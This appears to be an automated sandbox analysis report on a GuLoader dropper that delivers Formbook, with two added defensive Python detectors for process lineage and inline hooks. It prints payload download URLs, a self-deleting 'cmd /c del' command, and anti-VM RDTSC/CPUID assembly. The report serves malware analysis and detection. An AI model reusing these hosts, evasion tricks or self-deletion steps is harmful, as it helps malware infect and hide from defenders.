Source: 0000001F.00000002.1284276742.0000000000C20000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.480114894.000000001E160000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.480114894.000000001E160000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001D.00000000.464429746.000000000618B000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001D.00000000.464429746.000000000618B000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001F.00000002.1285203514.0000000004EC0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000001F.00000002.1285203514.0000000004EC0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000001F.00000002.1287054375.000000000596F000.00000004.00000001.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/0@17/13
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5696:120:WilError_01
Source: C:\Users\user\Desktop\F63V4i8eZU.exe File created: C:\Users\user\AppData\Local\Temp\~DFC9489ADE652B7AA1.TMP
Source: F63V4i8eZU.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\F63V4i8eZU.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\Desktop\F63V4i8eZU.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: F63V4i8eZU.exe Virustotal: Detection: 10%
Source: unknown Process created: C:\Users\user\Desktop\F63V4i8eZU.exe 'C:\Users\user\Desktop\F63V4i8eZU.exe'
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Process created: C:\Users\user\Desktop\F63V4i8eZU.exe 'C:\Users\user\Desktop\F63V4i8eZU.exe'
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
Source: C:\Windows\SysWOW64\chkdsk.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\F63V4i8eZU.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
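The process tree above carries three lineage patterns a detection engineer would alert on: the sample relaunches its own image with an identical command line, explorer.exe starts a SysWOW64 utility (chkdsk.exe) with no arguments, and that utility spawns cmd.exe /c del against the original file to remove the dropper. The Python below is an added example, not Joe Sandbox's code, that turns those three patterns into checks over "Process created" lines of this format. The embedded lines are copied from the report; the choice of which parents count as shells and which directories as system binaries is this example's assumption.

```python
import re

# One "Process created" line of the report; a trailing "Jump to behavior" link label is dropped:
#   Source: <parent image> Process created: <child image> <command line>
PROC_RE = re.compile(
    r"^Source:\s+(?P<parent>.+?)\s+Process created:\s+(?P<image>\S+)\s*(?P<cmdline>.*?)\s*$"
)

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Parents for which launching cmd.exe is ordinary shell or user activity (example's own choice).
SHELL_PARENTS = {"cmd.exe", "powershell.exe", "explorer.exe"}

# Lines copied from the report above.
SAMPLE_LINES = r"""
Source: unknown Process created: C:\Users\user\Desktop\F63V4i8eZU.exe 'C:\Users\user\Desktop\F63V4i8eZU.exe'
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Process created: C:\Users\user\Desktop\F63V4i8eZU.exe 'C:\Users\user\Desktop\F63V4i8eZU.exe'
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\chkdsk.exe C:\Windows\SysWOW64\chkdsk.exe
Source: C:\Windows\SysWOW64\chkdsk.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\F63V4i8eZU.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
""".strip().splitlines()


def basename(path):
    return path.rsplit("\\", 1)[-1]


def split_args(image, cmdline):
    """Drop a leading copy of the image path (quoted or bare) so only the arguments remain."""
    c = cmdline.strip()
    for form in (f"'{image}'", f'"{image}"', image):
        if c.lower().startswith(form.lower()):
            return c[len(form):].strip()
    return c


def parse_process_events(lines):
    """Return one dict per Process created line: parent, image, cmdline and the bare args."""
    events = []
    for line in lines:
        m = PROC_RE.match(re.sub(r"\s+Jump to behavior$", "", line.strip()))
        if m:
            e = m.groupdict()
            e["args"] = split_args(e["image"], e["cmdline"])
            events.append(e)
    return events


def lineage_findings(events):
    """Return (rule, detail) pairs for the three lineage patterns seen in this report."""
    findings = []
    for e in events:
        parent, image = basename(e["parent"]), basename(e["image"])
        # A process launching its own image again: staging step before code injection.
        if e["parent"].lower() == e["image"].lower():
            findings.append(("self_relaunch", image))
        # explorer.exe starting a system utility with no arguments: typical host for a hollowed payload.
        if parent.lower() == "explorer.exe" and e["image"].lower().startswith(SYSTEM_DIRS) and not e["args"]:
            findings.append(("argless_system_utility_from_explorer", image))
        # A system utility that is not a shell running cmd.exe ... del ...: the dropper removing itself.
        if (image.lower() == "cmd.exe" and e["parent"].lower().startswith(SYSTEM_DIRS)
                and parent.lower() not in SHELL_PARENTS and re.search(r"\bdel\b", e["args"], re.I)):
            findings.append(("self_deletion_via_cmd", f"{parent} -> cmd.exe {e['args']}"))
    return findings


if __name__ == "__main__":
    for rule, detail in lineage_findings(parse_process_events(SAMPLE_LINES)):
        print(f"{rule}: {detail}")
```

The conhost.exe line produces no finding, and cmd.exe started by explorer.exe is deliberately excluded from the self-deletion rule, since a user running a delete from a shell looks identical at the command-line level; the distinguishing signal is the non-shell system utility as the parent.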
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
Source: F63V4i8eZU.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: chkdsk.pdbGCTL source: F63V4i8eZU.exe, 00000012.00000002.475302278.00000000000D0000.00000040.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000001D.00000000.448678814.0000000009B40000.00000002.00000001.sdmp
Source: Binary string: chkdsk.pdb source: F63V4i8eZU.exe, 00000012.00000002.475302278.00000000000D0000.00000040.00000001.sdmp
Source: Binary string: C:\Program Files (x86)\Administrator-Cloud\Projects\ISOL.pdb source: chkdsk.exe, 0000001F.00000002.1285611475.0000000004FFD000.00000004.00000020.sdmp, F63V4i8eZU.exe
Source: Binary string: wntdll.pdbUGP source: F63V4i8eZU.exe, 00000012.00000002.480375309.000000001E390000.00000040.00000001.sdmp, chkdsk.exe, 0000001F.00000002.1285968735.0000000005440000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: F63V4i8eZU.exe, chkdsk.exe
Source: Binary string: wscui.pdb source: explorer.exe, 0000001D.00000000.448678814.0000000009B40000.00000002.00000001.sdmp

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 00000000.00000002.316460586.00000000022A0000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_00406408 push es; ret 0_2_0040640F
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_00405D8C push es; ret 0_2_00405D8B
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B1833 push edx; ret 0_2_021B1861
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B0218 push edx; ret 0_2_021B0241
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B4A13 push edx; ret 0_2_021B4A41
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B3213 push edx; ret 0_2_021B3241
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B1A13 push edx; ret 0_2_021B1A41
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B6214 push edx; ret 0_2_021B6241
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B5A03 push edx; ret 0_2_021B5A31
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B4205 push edx; ret 0_2_021B4231
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B2A05 push edx; ret 0_2_021B2A31
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B1205 push edx; ret 0_2_021B1231
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B4233 push edx; ret 0_2_021B4261
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B2A33 push edx; ret 0_2_021B2A61
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B1233 push edx; ret 0_2_021B1261
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B5A33 push edx; ret 0_2_021B5A61
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B5225 push edx; ret 0_2_021B5251
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B3A24 push edx; ret 0_2_021B3A51
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B2224 push edx; ret 0_2_021B2251
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B0A24 push edx; ret 0_2_021B0A51
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B6A24 push edx; ret 0_2_021B6A51
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B0A58 push edx; ret 0_2_021B0A81
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B5253 push edx; ret 0_2_021B5281
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B3A54 push edx; ret 0_2_021B3A81
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B2254 push edx; ret 0_2_021B2281
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B6A54 push edx; ret 0_2_021B6A81
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B0248 push edx; ret 0_2_021B0271
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B4A44 push edx; ret 0_2_021B4A71
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B3244 push edx; ret 0_2_021B3271
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B1A44 push edx; ret 0_2_021B1A71
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_021B6244 push edx; ret 0_2_021B6271

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x85 0x5E 0xEC
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\chkdsk.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
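The PeekMessageA finding above is the output of a prolog integrity check: the first bytes of an exported user32.dll function as mapped in explorer.exe no longer match the on-disk image. The Python below is an added example, not part of the report or of Joe Sandbox, that performs the same comparison over a table of exports and names the hook shape when it is one of the common trampolines. The observed bytes for PeekMessageA are the six the report lists; the reference bytes and the other two exports are constructed for the example, since the report does not show the original prolog.

```python
import struct

# Patched prolog bytes the report observed for user32!PeekMessageA in explorer.exe.
OBSERVED_PEEKMESSAGEA = bytes.fromhex("48 8B B8 85 5E EC")

# Constructed stand-ins for the on-disk prologs (assumption for the example, not real user32.dll bytes).
SAMPLE_REFERENCE = {
    "PeekMessageA": bytes.fromhex("48 89 5C 24 08 57"),
    "GetMessageA": bytes.fromhex("48 83 EC 28 48 8B"),
    "TranslateMessage": bytes.fromhex("40 53 48 83 EC 20"),
}
# Constructed "as mapped in the process" table: PeekMessageA carries the report's bytes,
# GetMessageA a classic 5-byte jmp trampoline, TranslateMessage is untouched.
SAMPLE_LIVE = {
    "PeekMessageA": OBSERVED_PEEKMESSAGEA,
    "GetMessageA": bytes.fromhex("E9 10 20 30 00 8B"),
    "TranslateMessage": bytes.fromhex("40 53 48 83 EC 20"),
}


def classify_prolog(expected, observed, n=6):
    """Compare the first n bytes of a function in memory with the clean image bytes.

    Any difference counts as a hook.  The shape is named only for the common trampolines;
    everything else is reported as 'unknown patch', which is what the PeekMessageA bytes
    from this report come out as."""
    exp, obs = bytes(expected[:n]), bytes(observed[:n])
    if exp == obs:
        return {"hooked": False, "shape": None}
    shape = "unknown patch"
    if len(obs) >= 5 and obs[0] == 0xE9:                        # jmp rel32
        rel = struct.unpack_from("<i", obs, 1)[0]
        shape = f"jmp rel32 (displacement {rel:+#x})"
    elif len(obs) >= 2 and obs[:2] == b"\xFF\x25":              # jmp [disp32] / jmp [rip+disp32]
        shape = "jmp [mem]"
    elif len(obs) >= 6 and obs[0] == 0x68 and obs[5] == 0xC3:   # push imm32; ret
        shape = "push imm32; ret"
    elif len(obs) >= 2 and obs[:2] == b"\x48\xB8":              # mov rax, imm64 (usually followed by jmp rax)
        shape = "mov rax, imm64"
    elif len(obs) >= 2 and obs[:2] == b"\xEB\xF9":              # jmp -7 into the hot-patch pad before mov edi, edi
        shape = "short jmp into hot-patch pad"
    return {"hooked": True, "shape": shape, "expected": exp.hex(" "), "observed": obs.hex(" ")}


def scan_exports(reference, live, n=6):
    """Classify every export present in both tables and return only the modified ones."""
    findings = {}
    for name in sorted(reference.keys() & live.keys()):
        result = classify_prolog(reference[name], live[name], n)
        if result["hooked"]:
            findings[name] = result
    return findings


if __name__ == "__main__":
    for name, r in scan_exports(SAMPLE_REFERENCE, SAMPLE_LIVE).items():
        print(f"{name}: {r['expected']} -> {r['observed']} ({r['shape']})")
```

The classifier reports any difference rather than only known trampolines: the PeekMessageA patch here does not start with a jmp, push/ret or mov rax, so a scanner matching only those shapes would miss it. When the reference table is built from the DLL on disk, apply the image's relocations to the code bytes first (or mask relocated operands); otherwise loader fixups show up as false hits.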

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A5852 NtWriteVirtualMemory,LoadLibraryA, 0_2_022A5852
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A08DC NtWriteVirtualMemory,TerminateProcess, 0_2_022A08DC
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A045E EnumWindows,NtWriteVirtualMemory, 0_2_022A045E
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A8DB4 NtWriteVirtualMemory,CreateProcessInternalW, 0_2_022A8DB4
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A423F NtWriteVirtualMemory, 0_2_022A423F
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A4263 NtWriteVirtualMemory, 0_2_022A4263
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A4277 NtWriteVirtualMemory, 0_2_022A4277
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A5A46 NtWriteVirtualMemory,LoadLibraryA, 0_2_022A5A46
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A5A84 0_2_022A5A84
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A2AFD 0_2_022A2AFD
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A2AD6 0_2_022A2AD6
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A33A7 NtWriteVirtualMemory, 0_2_022A33A7
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A78B2 0_2_022A78B2
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A28E2 NtWriteVirtualMemory,LoadLibraryA, 0_2_022A28E2
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A4128 NtWriteVirtualMemory, 0_2_022A4128
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A3920 LoadLibraryA, 0_2_022A3920
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A513E NtWriteVirtualMemory, 0_2_022A513E
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A46E4 NtWriteVirtualMemory, 0_2_022A46E4
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A7EFC LoadLibraryA, 0_2_022A7EFC
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A1FD9 NtWriteVirtualMemory, 0_2_022A1FD9
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A2470 NtWriteVirtualMemory,LoadLibraryA, 0_2_022A2470
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A3C4D NtWriteVirtualMemory, 0_2_022A3C4D
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A7CA5 NtWriteVirtualMemory, 0_2_022A7CA5
Source: C:\Users\user\Desktop\F63V4i8eZU.exe Code function: 0_2_022A7488 NtWriteVirtualMemory, 0_2_022A7488
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 00000000022A0182 second address: 00000000022A0182 instructions:
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 00000000022A6E61 second address: 00000000022A6E61 instructions:
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 00000000022A01B2 second address: 00000000022A01B2 instructions:
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 00000000022A78FC second address: 00000000022A790A instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a pushad 0x0000000b lfence 0x0000000e rdtsc
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 00000000022A83B5 second address: 00000000022A83B5 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp byte ptr [ebx], al 0x0000000c mov eax, dword ptr [ebp+0000025Ch] 0x00000012 jne 00007EFE34D2B3ABh 0x00000014 mov dword ptr [ebp+0000022Eh], esi 0x0000001a mov esi, AFB1434Bh 0x0000001f test bl, bl 0x00000021 cmp cl, bl 0x00000023 add esi, 0257D909h 0x00000029 add esi, 650EE949h 0x0000002f xor esi, 1718259Dh 0x00000035 clc 0x00000036 cmp ecx, esi 0x00000038 mov esi, dword ptr [ebp+0000022Eh] 0x0000003e jne 00007EFE34D2B117h 0x00000044 cmp bx, FDCDh 0x00000049 inc ecx 0x0000004a inc ebx 0x0000004b cmp ah, bh 0x0000004d mov dword ptr [ebp+0000018Bh], ecx 0x00000053 mov ecx, dword ptr [ebx] 0x00000055 cmp ecx, 9090C350h 0x0000005b mov ecx, dword ptr [ebp+0000018Bh] 0x00000061 jne 00007EFE34D2B3A6h 0x00000063 mov dword ptr [ebp+00000243h], ecx 0x00000069 mov ecx, edx 0x0000006b cmp ecx, dword ptr [ebx] 0x0000006d mov ecx, dword ptr [ebp+00000243h] 0x00000073 jne 00007EFE34D2B37Ah 0x00000075 mov byte ptr [ebp+000001FBh], cl 0x0000007b test ebx, ebx 0x0000007d mov cl, byte ptr [ebx] 0x0000007f cmp cl, FFFFFFE8h 0x00000082 mov cl, byte ptr [ebp+000001FBh] 0x00000088 jne 00007EFE34D2B467h 0x0000008e mov dword ptr [ebp+0000025Ch], eax 0x00000094 mov eax, 4C6E8F3Eh 0x00000099 sub eax, 0007D298h 0x0000009e xor eax, B23D3242h 0x000000a3 add eax, 01A471D4h 0x000000a8 pushad 0x000000a9 rdtsc
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 0000000000566C24 second address: 0000000000566C24 instructions:
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 0000000000565B7B second address: 0000000000565BB6 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp edx, ebx 0x0000000c test eax, eax 0x0000000e je 00007EFE34D2B700h 0x00000014 pushad 0x00000015 mov dl, 95h 0x00000017 cmp dl, FFFFFF95h 0x0000001a jne 00007EFE34D2EAEFh 0x00000020 popad 0x00000021 mov dword ptr [ebp+000000E8h], eax 0x00000027 fnop 0x00000029 test bh, ch 0x0000002b mov eax, ebp 0x0000002d add eax, 00000100h 0x00000032 test ecx, edx 0x00000034 mov dword ptr [eax], 4FD2ADFDh 0x0000003a pushad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 0000000000565BB6 second address: 0000000000565BED instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a cmp edx, ebx 0x0000000c add dword ptr [eax], B8DD5D9Fh 0x00000012 pushad 0x00000013 mov dl, 11h 0x00000015 cmp dl, 00000011h 0x00000018 jne 00007EFE34BE0586h 0x0000001e popad 0x0000001f sub dword ptr [eax], 2B06605Eh 0x00000025 xor dword ptr [eax], DDA9ACEEh 0x0000002b fnop 0x0000002d test bh, ch 0x0000002f push 8402AFE5h 0x00000034 test ecx, edx 0x00000036 pushad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 0000000000565BED second address: 0000000000565BED instructions:
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 0000000000562BCB second address: 0000000000562BCB instructions:
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 0000000000563C85 second address: 0000000000563F54 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a sub edx, 22E6120Ah 0x00000010 xor edx, 256ED0EBh 0x00000016 cmp ax, 0000EAB4h 0x0000001a cmp dword ptr [esi+24h], edx 0x0000001d mov edx, dword ptr [ebp+00000273h] 0x00000023 je 00007EFE34BDD0C7h 0x00000029 mov ebx, 263052C4h 0x0000002e cmp dx, ax 0x00000031 xor ebx, B0E6794Fh 0x00000037 add ebx, 61B5A210h 0x0000003d pushad 0x0000003e rdtsc
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 0000000000563F54 second address: 0000000000563F54 instructions:
Tries to detect Any.run
Source: C:\Users\user\Desktop\F63V4i8eZU.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\F63V4i8eZU.exe File opened: C:\Program Files\qga\qga.exe
Source: C:\Users\user\Desktop\F63V4i8eZU.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\F63V4i8eZU.exe File opened: C:\Program Files\qga\qga.exe
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: F63V4i8eZU.exe, 00000000.00000002.316897484.0000000002B80000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
Source: F63V4i8eZU.exe, 00000000.00000002.316897484.0000000002B80000.00000004.00000001.sdmp, F63V4i8eZU.exe, 00000012.00000002.475431458.00000000006F0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: F63V4i8eZU.exe, 00000012.00000002.475431458.00000000006F0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=HTTPS://KINMIRAI.ORG/WP-CONTENT/BIN_QVWER224.BINHTTP://FARMERSSCHOOL.GE/BIN_QVWER224.BINWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 00000000022A0182 second address: 00000000022A0182 instructions:
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 00000000022A6E61 second address: 00000000022A6E61 instructions:
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 00000000022A01B2 second address: 00000000022A01B2 instructions:
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 00000000022A78FC second address: 00000000022A790A instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a pushad 0x0000000b lfence 0x0000000e rdtsc
Source: C:\Users\user\Desktop\F63V4i8eZU.exe RDTSC instruction interceptor: First address: 00000000022A790A second address: 00000000022A79F6 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b mov esi, DCAAA67Fh 0x00000010 test dl, dl 0x00000012 xor esi, F2CCAB26h 0x00000018 test edx, edx 0x0000001a sub esi, 536EBD65h 0x00000020 test bh, ch 0x00000022 xor esi, DAF7BFF4h 0x00000028 test ecx, ecx 0x0000002a test bx, cx 0x0000002d add esi, 00001000h 0x00000033 test bx, ax 0x00000036 cmp cl, dl 0x00000038 cmp bx, dx 0x0000003b mov dword ptr [ebp+000001F8h], FC14852Ch 0x00000045 test ebx, ecx 0x00000047 xor dword ptr [ebp+000001F8h], 83A94D75h 0x00000051 xor dword ptr [ebp+000001F8h], AA3F6E81h 0x0000005b cmp ah, 00000015h 0x0000005e sub dword ptr [ebp+000001F8h], D581B6D8h 0x00000068 cmp esi, dword ptr [ebp+000001F8h] 0x0000006e je 00007EFE34D2B83Ah 0x00000074 mov dword ptr [ebp+00000204h], 67BCF0E4h 0x0000007e xor dword ptr [ebp+00000204h], E457B680h 0x00000088 xor dword ptr [ebp+00000204h], E04C2F31h 0x00000092 xor dword ptr [ebp+00000204h], 1C589955h 0x0000009c cmp ch, dh 0x0000009e cmp esi, dword ptr [ebp+00000204h] 0x000000a4 je 00007EFE34D2B804h 0x000000aa test cl, dl 0x000000ac mov dword ptr [ebp+00000246h], 